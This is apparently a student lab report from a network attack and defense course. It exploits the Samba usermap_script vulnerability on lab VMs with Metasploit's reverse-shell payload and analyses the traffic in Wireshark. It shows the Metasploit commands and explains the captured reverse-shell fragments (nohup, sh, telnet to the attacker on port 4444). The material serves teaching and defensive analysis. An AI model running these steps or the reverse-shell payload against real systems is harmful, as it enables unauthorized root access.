• 20211912 202120222 《网络攻防实践》第七周作业


    20211912 2021-2022-2 《网络攻防实践》第七周作业

    1 知识点梳理与总结

    1.1 Samba 服务

    • 主要用于Linux和Windows系统主机间的文件共享,也可用于Linux和Linux之间的共享文件

    1.2 usermap_script

    • 用户名映射脚本,是Samba上的一个漏洞,当使用非默认的用户名映射脚本配置选项时产生,因为未对用户名进行过滤,因此可以通过指定一个包含shell元字符的用户名,执行任意命令,且无认证

    1.3 实践内容

    2 虚拟机信息

    虚拟机 IP地址
    Kali 192.168.31.104
    Metasploitable_ubuntu 192.168.31.154
    Metasploitable_ubuntu 192.168.31.50

    3 使用Metasploit进行Linux远程渗透攻击

    • 打开msfconsole,使用命令use exploit/multi/samba/usermap_script使用该模块,再使用命令show payloads查看可以供我们使用的攻击载荷

    • 使用命令set payload cmd/unix/reverse来进行双向连接,

    • 设置好参数(LHOST设置为攻击机的IP地址RHOST设置为靶机的IP地址)并使用命令exploit进行攻击

    • 执行一些简单指令进行验证,发现成功获取到靶机root控制权限,攻击成功

    4 攻防对抗实践

    • 和上述过程一样,在使用命令exploit进行攻击前,防守方使用wireshark监听获得的网络数据包

    5 windows系统远程渗透攻击和分析

    • 和上述过程一样,在使用命令exploit进行攻击前,防守方使用wireshark监听获得的网络数据包

    • 从数据包中可以得到以下信息:

    攻击机 靶机
    IP地址:192.168.31.104 IP地址:192.168.31.50
    端口: 41821 端口:139
    • 攻击发起时间:从ARP协议的询问开始

    • 由于攻击的是139号端口,由查阅的资料可知139端口是Samba服务端口,由此可知攻击者利用了Samba服务漏洞

    • 从第一个SMB数据包中找到shellcode

    • nohupno hang up的简写,即不挂断地运行命令,退出终端不会影响程序的运行;shLinux中运行shell的命令,是shell的解释器telnet 192.168.31.104 4444表明数据是通过4444号端口传入攻击机的;/dev/null 2>&1意指执行某个命令将不会有任何日志输出

    • 通过追踪TCP流确定攻击机执行的命令,有whoami、ifconfig

    6 学习中遇到的问题及解决

    • 问题1:对抓取的数据包中部分指令不了解
    • 问题1解决方案:上网查找资料慢慢进行分析

    7 学习感悟、思考

    • 通过上次的实践,本次实践做起来较简单,对wireshark数据包的抓取和分析也更加熟练,继续加油

    8 参考资料

  • 相关阅读:
    JavaScript Math
    从俄罗斯套娃开始的信封嵌套问题
    Educational Codeforces Round 80 A
    位运算的奇技淫巧(三)
    Educational Round 95 (Div. 2) A
    POJ 1985.Cow Marathon(DFS求树的直径模板题)
    Web开发初探(系统理解Web知识点)
    经典Python案例实现
    Codeforces Round #670 (Div. 2) 深夜掉分(A
    Problem B
  • 原文地址:https://www.cnblogs.com/lxr1006/p/16191396.html
Copyright © 2020-2023  润新知